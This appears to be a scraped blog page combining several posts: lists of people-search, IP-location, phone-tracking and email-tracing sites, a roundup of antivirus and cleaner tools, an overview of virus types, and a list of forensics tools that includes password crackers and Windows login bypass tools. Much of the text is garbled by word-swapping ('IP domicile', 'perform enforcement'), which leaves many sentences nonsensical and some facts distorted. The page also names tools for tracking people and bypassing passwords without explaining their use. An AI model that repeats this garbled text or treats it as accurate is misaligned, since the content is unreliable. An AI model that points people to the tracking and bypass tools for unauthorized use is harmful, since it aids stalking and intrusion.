    Public Access to Court Electronic Records (PACER)
    FBI Sex Offender Registry
    Family Watchdog Offender Registry
    Criminal Check Offender Registry
    Public Data
    Public Record Finder
    Black Book Online
IP To Location - Here I pay for you once a list of useful sites to be dexterous to child support a persons IP domicile to the approximate geographical location:
    IP Address Labs
    What's my IP domicile?
    What's My IP? (With Map of location)
    Free GeoIP
    Max Mind - GeoIP2 Precision
    Info Sniper
    Traceroute
IP Of Domain and Hosts - Here I offer you as soon as resources that you can use to locate the IP domicile of a website and with to locate the approximate location of that site as proficiently who is hosting that site.
    Domain Tools - A utterly informative site when on zenith of just a finding of the IP of the Site.
    Site24*7 - A enormously amassed site for this much once Domain Tools above.
    Reverse IP Tracer - This will instantly have the funds for you the server location of the site and the site's ISP.
    Whois Lookup
    Whois Hosting
    NetCraft - Caters for beautiful much anything you dependence to know about a website.
Phone Lookups And Tracking - Resources for looking taking place mention upon a phone number:
    White Pages
    AnyWho - Also a people search tool as skillfully as a phone lookup and many new things
    Who Calls Me? - Reverse phone directory.
    Switchboard - Again a people and matter search as dexterously as a revers phone lookup.
    Yellow Pages Reverse Lookup
    World-Tracker - This will locate the location of any phone number you have taking into account you've got it though of course by using further GPS technology.
Validating Emails and Finding Their IP - Here I meet the expense of you some resources which you can use to insist to see if an email dwelling exact and/or locate the IP of that email domicile:
    IP Tracker - Basically an email statement tool following some auxiliary IP tracking resources.
    Email Header Tracer - Great showing off of finding out the IP of an email house.
Maps (Land and Satellite) - On your quest for hunting for mention these are certain forward in user-handy:
    Google Earth - Find any location in the world following this 3D image Map of the earth.
    Bing Maps
    Yahoo Maps
    Google Maps
    MapQuest
Other - The lonely new situation that I was supple to locate but no scrutinize informative was a site called Internet Sleuths - This basically has happening for anything you compulsion in regards to finding hint. Basically in a nut-shell, they found the opinion for that gloss you don't have too.

Collection of tools to detect viruses

Collection of tools to detect viruses

It is a fact that if you have a internet connection or USB/CD purpose that gets used across compound computers you are vulnerable to viruses, this guide has been compiled by me to facilitate users court skirmish adjoining these hidden attackers. This is even more loud if a professional malware writer has to your liking SEO skills to succeed to the #1 upshot, contaminate a real report of the malware detector taking into account his own malicious code. Imagine a System Administrator happily installing an Anti-Malware in the region of all the dozens (or hundreds) of workstations below his achieve.
Firewalls

Firewalls block malicious programs from running, as expertly as protecting ports and attacks through the internet. A firewall is a necessary component in today's computing world.

Recommended firewalls:
1# Sunbelt Personal Firewall
2# Outpost Firewall
3# Comodo Internet Security

Anti-viruses
Anti-viruses can be on depth of just a scanner (which we will lid soon), nowadays not well-disposed of-viruses arrive packed full of new features, some even including built in firewalls, but a main feature popping happening in diagnostic of-viruses is "definite-become obsolete guidance" which scans files which your are commencement, have right to use and keeps a log and watches out for whats going on regarding your system. Anti-viruses are developing more and more as become antique goes regarding, just to retain happening when its competition.

Recommended Anti-viruses:

1# Sunbelt Vipre Antivirus + Antispyware
2# Avira Anti-virus suite Professional
3# Trend Micro AntiVirus + AntiSpyware

TCP/UDP spectators

These programs assert you to see the connections visceral made through your ports, these are likable tools for detecting bots, rats and key loggers approximately the order of your computer. They play in by listing the lithe buddies of the dealing out programs and have the funds for you the distant dwelling if there is one, using this you can usually publicize if it is a malicious program accessing your computer,or you can reveal by putting the IP blazing into this website,

Recommended TCP/UDP spectators:
1# Currports - This program gives you a enormously detailed list of recommendation upon the supple friends

2# TCP view - This one does the same matter but later a tiny bit less info.

Scanners

Now, Scanners are a tiny exchange to your adjacent to-viruses, scanners are built to detect malware in a more true quirk than most touching-viruses will, they profit updated regularly and can be compact and portable, but yet money big adroitness.

Recommended Scanners:

1# Malwarebyte's Anti-Malware - This has to be one of the best scanners ever it detects millions of viruses and should be used for regular scans
2# SuperAntiSpyware - This is option colossal malware/spyware scanner i use it along side Malwarebyte's and Vipre for optimal lawsuit subsequent to regular scans (detects some viruses Malwarebyte's doesn't).
3# SpyBot Search and Destroy - Huge database of spyware and resident verify for changes.
Logger's

I couldn't really arrive occurring when a huge proclaim for these programs consequently i called them loggers due to the fact they pay for logs which moreover can be revised to search for malicious entries. Logger's mainly search registry keys, begin going on items and admin processes, they manage to pay for in you to cut off these entries to sum less the virus from vis--vis-appearing upon begin occurring, however should always be followed occurring by a virus scan and removal of the file logged.

Recommended Logger's:

1# Hijackthis - Hijackthis is a highly developed program that allows users to easily remove crucial parts of viruses to merge less them from occurring and should be used regularly (gone a log posted to hjt team) to check if you have accidentally installed something malicious.

Cleaners

There are many "cleaners" upon the internet that remove performing files which can slow your computer, and contain malicious files, cleaners were made to court quarrel these problems and are efficient for discharge occurring ventilate, your the theater files can profit occurring to massive sizes, my highest was 3 gigabytes, now that's beautiful big for the stage files.

Recommended cleaner's:

1# Ccleaner (formerly known as crap cleaner) - Ccleaner is a utterly efficient and short cleaner that has many useful options, including (but not limited to) file cleaner, registry cleaner, begin happening editor, uninstall list. Ccleaner is a utterly indispensable tool and is a must for a pc enthusiast.
2# ATF-Cleaner - Cleans temp files more or less the same as Ccleaner a small bit alternating.

USB Protection

Many extra viruses have the functionality to press on using removable disks such as USB's and it is now recommended to use an not in agreement of-virus for your USB as you may decline occurring infecting your own computer. portableapps.com has many portable programs worth checking out.

Recommended USB Anti-viruses:

1# ClamWin Portable - Great hostile to-virus for your USB dream.

Computer Viruses and Its Type

 Computer Viruses and Its Type

What is a Computer Virus ?
A potentially damaging computer programme warm of reproducing itself causing permitted treat badly to files or added programs without admission or knowledge of the user.

Types of viruses :-
The exchange types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses contaminate either the master boot collection of the hard disk or the floppy determination. The boot autograph album program held liable for the booting of effective system is replaced by the virus. The virus either copies the master boot program to option share of the hard disk or overwrites it. They pollute a computer following it boots taking place or later it accesses the dirty floppy disk in the floppy dream. i.e. Once a system is mixed assign support to on a boot-sector virus, any non-write-protected disk accessed by this system will become misrepresented.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, following executed, load the virus in the memory and doing predefined functions to contaminate the system. They pollute program files also extensions later than .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects fused every substitute get-up-and-go platforms, and remains recursively infective in each direct. It attempts to violent behavior both the boot sector and the executable, or programs, files at the same period. When the virus attaches to the boot sector, it will in slant comport yourself the systems files, and gone the virus attaches to the files, it will in direction make polluted the boot sector.
This type of virus can as regards-taint a system on intensity of and more than bearing in mind as well as again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in birds means it uses various methods for hiding themselves to avoid detection. They sometimes cut off themselves from the memory temporarily to avoid detection by antivirus. They are somewhat well ahead to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a tidy image of the file or boot sector.

5) Polymorphic Viruses
:- Polymorphic viruses have the accomplish to mutate implying that they adjust the viral code known as the signature each era they go ahead or pollute. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or same application and causes a sequence of happenings to be performed automatically considering the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often build uphill as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

Monday 17 November 2014

Best Computer Forensics Tools and Resources

Best Computer Forensics Tools and Resources

Forensic computing is the process of identifying, preserving, analyzing and presenting digital evidence in a appearance that is legally acceptable. To fabricate evidence in the court that can guide to the punishment of the actual.o To ensure the integrity of the computer system.o To focus a propos the response to hi-tech offenses, started to intertwine.

Following are the Computer Forensics Resources which we can use to carry out any investigation.

 
Computer Investigation Tools

CAINE Live CD/DVD - Stands for Computer Aided Investigative Environment and is expected to lead the forensics investigator through the four stages of digital psychotherapy. Another advantage of this is that it's forgive and retrieve source which means you can experiment behind it for pardon.

Access Data - A area to make a obtain of a multitude of forensic resources such as tool-kits, mobile phone examiners, alive nod system and colossal quantity more.

Hiren's BootCD 15.2 - Not specifically intended for forensics scrutiny but profusion of stuff there that would be utterly useful to the investigator including the sudden removal of Windows passwords.

Free IT Forensic Software - It covers disk imaging tools, email analyses, Mac OS tools, Mobile device analyses, USB write Blockers etc. You publicize it and they've got it!

EnCase Forensic v7.08 - Another pleasurable area for the investigator to get massive compliment winning premium forensic equipment.

Sleuth-Kit/Autopsy - Open source live Linux distro expected for digital forensics investiagion and can be used re beautiful much any on the go system. Also a pleasurable many thanks to _Silky for suggesting this.

List of digital forensics tools - A Wikipedia arctice behind a invincible list of digital forensics tools, enormously useful for the investigator.

Computer Forensics Resource List - Contained here you'll locate beautiful much all the forensics resources you'll ever dependence. It consists of a colossal list meant for student, teachers and professionals.

Password Crackers and Removers

 Cain And Abel - A password recovery tool that uses Dictionary, Brute-Force and Cryptanalysis attacks. It as well as serves many subsidiary pleasing purposes for network admins, teachers, forensic staff etc.

 l0phtcrack - And appreciation winning password recovery and auditioning tool, often used by the US military and appendage firms alike.

 John the Ripper - A utterly fast password cracker but on your own works at the forefront colorless passwords.
Ophcrack - Much considering l0phtcrack and uses rainbow attacks but all yet again again single-handedly works in savings account to wishy-washy passwords.

Kon-Boot - A tool for bypassing Windows password which is guaranteed to moving picture, especially if you make a get your hands on of the premium fable unaided for $15. The easily reached report may or may not operate as a result taking into account ease depending occurring for sure factors.

 Offline Windows Password & Registry Editor - A forgive Windows password removal tool that works a propos any system sophisticated than Windows 2000. You can as well as follow the tutorial via the website on the subject of the subject of how to realize this or by going here or by in imitation of my tutorial as competently found here.

PC Login Now - Another password resetting tool now released as freeware. It along with provides resources for finding auxiliary passwords such as email, Instant Messenger Passwords, VPN's and much more.


Network and Website Forensics Resources

NetScanTools - Also used by perform enforcement and handy report for the home users. However a premium fable would be more beneficial to the investigator. This is one powerful tool and as a after effects if you ever use it create certain to know what your feign and to use it ethically.

Wireshark - A intensely sophisticated protocol analyser that lets you see in frightful detail what's happening regarding your network. Although it can be monstrous it's probably more defensive.

BackTrack - Was not therefore long ago the greatest network and intelligence chemical analysis alive distro in the world. And this is something you'll see a lot of concerning HF.

Metasploit - Another earsplitting penetration tool expected to locate and flavor vulnerabilities. And it's furthermore arbitrator not guilty.

Kali Linux - From the creators of BackTrack now comes Kali Linux and is currently the most minister to network and pen-examination flesh and blood distro in the world to date. Also a big thank you to DrDinosaur For suggesting this.

Nmap - A forgive recognition sourece security scanner and was plus discovered in a couple of movies not thus long ago too. It has an abundance of tools to use such as bodily adept to scan loud networks of hundreds of computers as sited in the site. Also a thank you to whyitell for the reminder.

Counter-court dogfight Tools and Resources
TCPView - A supreme tool that allows you to see every part of the local and cold flaming just roughly speaking your computer. If you see anything suspicious regarding your computer in addition to it could be a sign that someone is trying or has gained distant entry. Once you have verified this you can in addition to go vis--vis the subject of auxiliary to trace the perpetrator. But more concerning this far and wide away ahead.

Show Hidden - "This is a tool written by BleepingComputer.com that will list every single one hidden folders, and files if you drive, going on for your computer. As many hackers conceal their tools and files in a hidden scrap book, this tool will make it easier to locate hidden folders that appear suspicious. (Cited in BleepingComputer.com, upon February 17, 2004 | Last Updated: February 22, 2013, http://www.bleepingcomputer.com)

Project Honey Pot - Millions of attackers trapped, monitored and black-listed; this is indeed a useful place to visit if you are the owner of a website or network.

Prevention Techniques: Cross-site request forgery (CSRF)

1. The best defense against CSRF attacks is unpredictable tokens, a piece of data that the server can use to validate the request, and wh...